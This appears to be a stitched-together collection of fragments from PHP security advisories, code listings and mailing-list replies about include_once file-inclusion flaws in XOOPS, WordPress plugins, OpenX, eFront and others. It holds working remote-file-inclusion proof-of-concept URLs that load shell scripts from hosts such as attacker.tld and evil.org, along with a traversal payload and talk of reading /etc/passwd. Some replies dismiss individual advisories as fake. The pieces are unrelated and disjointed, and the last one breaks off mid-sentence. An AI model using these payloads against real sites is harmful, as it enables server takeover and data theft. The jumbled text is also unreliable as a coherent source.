include once
$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");
if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];
--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
header ('Content-Type: text/html; charset=utf-8');
// Data Includes
include_once "PHPLib/db_mysql.inc";
include_once "Data/dbConnection.class.php";
include_once "Data/dbConfig.class.php";
include_once "Data/dataAdapter.class.php";
include_once "Quicksite/Core/domxml.class.php";
bugs:
xoops-2.0.16-Kararli/htdocs/notifications.php include_once $lookup_file;
xoops-2.0.16-Kararli/htdocs/extras/login.php include $path.'/mainfile.php';
xoops-2.0.16-Kararli/htdocs/include/functions.php require_once $hnd_file;
xoops-2.0.16-Kararli/htdocs/include/functions.php include_once $hnd_file;
xoops-2.0.16-Kararli/htdocs/kernel/notification.php include_once $tags_file;
xoops-2.0.16-Kararli/htdocs/kernel/notification.php include_once $lookup_file;
[!] index.php
// load global definitions
if($home = getenv('YACS_HOME'))
include_once str_replace('//', '/', $home.'/').'shared/global.php'; // <= 0
elseif(is_readable('yacs.home') && is_callable('file_get_contents') && ($content = trim(file_get_contents('yacs.home'), " \t\n\r\0\x0B\\/.")) && is_readable($content.'/shared/global.php'))
include_once $content.'/shared/global.php'; // <= 1
elseif(is_readable('shared/global.php'))
include_once 'shared/global.php';
elseif(is_readable('yacs/shared/global.php'))
// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
// user customized language file (already read by common.php)
// include_once "$mydirpath/language/$language/main.php" ;
} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
// default language file
include_once "$mytrustdirpath/language/$language/main.php" ;
...
Below you can find the sources of two simple "academic" fuzzers, later
results are discussed and finally POCs and conclusions are proposed.
II) PHP arbitrary Local File Inclusion testing
This tests include(), include_once(), require(), require_once() and
similar functions.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
alfi_fuzzer.php:
2. $nextitem comes from a database row.
3. $specialtemplates isn't even used.
Rather than just searching for require_once / include_once in the code maybe actually read the context or even do some testing?
Scott MacVicar
Development Team, vBulletin
C) Local File Inclusion
In settings.php a user can set the favorite theme to use.
This theme is included using the include_once PHP function.
The original path is themes/ but using the directory
traversal sequence, a user can include arbitrary files.
There is a limit on the number of characters that can be used; in fact the theme
field in the database has a length limit equal to 25.
if ( file_exists("./language/".$language."/install.php") ) {
include_once "./language/".$language."/install.php";
files on a Rapidleech server, especially files containing sensitive
information, e.g. "/etc/passwd".
The second flaw is a Local File Inclusion vulnerability, which occurs
because programmers did not perform a check on the input parameter of the
include_once() function. This input is also sent by users via the "uploaded"
parameter and is a relative path to a script file which uploads files to a
particular file sharing website, for instance yousendit.index.php,
4shared.index.php. Therefore, hackers can read the content of an arbitrary
file by making the path in the input point to that file. If that file
contains malicious code, hackers can take control of the Rapidleech's
Register Globals: ON
Vuln code:
<?php
/* Name: Syntax Highlight */
include_once ("$libpath/geshi/geshi.php");
Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?
define('IN_SCRIPT', 'true');
you should read the code, or at least do a basic search with your editor for:
-include($
-include_once($
-require($
-require_once($
Please guys, stop spreading this kind of false advisory.
From vendor:
In future merge to PHP6, because magic_quotes will be removed from PHP 6 completely. See http://www.php.net/~derick/meeting-notes.html#magic-quotes.
Example:
By reading readme.txt create example.php:
<?php include_once "./admin/functions.php";
$config = Config();
#Here we have the dynamic news template change
$tid = $_GET['template'];
include "./news.php";
?>
+ Vulnerable Code
+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );
+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]
+ Script Download
you should read the code, or at least do a basic search with your editor for:
-include($
-include_once($
-require($
-require_once($
Don't you think you should try your "PoC" before you send it to a professional list like SecurityFocus Bugtraq?
Please guys, stop spreading this kind of false advisory.
This is because of the many (evil) normalization instructions and
routines implemented in PHP in conjunction with a feature: include_path.
include_path is a feature of PHP similar to the PATH on unix systems,
when an include, include_once, require or require_once call is made if
the file is relative (eg: doesn't begin with a slash or a drive letter
on Windows) a lookup will happen in every path defined in include_path.
include_path is defined both at ./configure time and in the php.ini or
at runtime with ini_set("include_path" ..) and defaults to ".:".
I have found a local file inclusion exploit in OpenX 2.6.3; it is in the script "fc.php", located in /www/delivery/
Here is a snip of the code:
[snip]
include_once '../../init-delivery.php';
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
exit(1);
}
It's a Fake:
There's the line:
[Line 827] include_once($fichero);
It isn't possible to change the value of this variable with a GET parameter:
$as_language = $_POST['as_language'];
$extract = $_POST['extract'];
$docgrp = $_POST['docgrp'];
$highlightResult = $_POST['highlightResult'];
include_once MODX_BASE_PATH .
'assets/snippets/AjaxSearch/includes/AjaxSearch.inc.php';
include MODX_BASE_PATH .
'assets/snippets/AjaxSearch/includes/templates.inc.php';
#include default language file
#Contact: 0in.email@gmail.com
#Download:http://pmm-cms.sourceforge.net/
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";
Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt?
Original first post & exploit: http://milw0rm.com/exploits/4465
eFront-learning is vulnerable to a local file inclusion vulnerability.
The file 'language.php' located in
'/www/editor/tiny_mce/langs/language.php' has the following code:
/-----
include_once $path."language/lang-".$_GET['langname'].".php.inc";
- -----/
Thus any arbitrary file can be included, using the following attack
vector:
/-----
|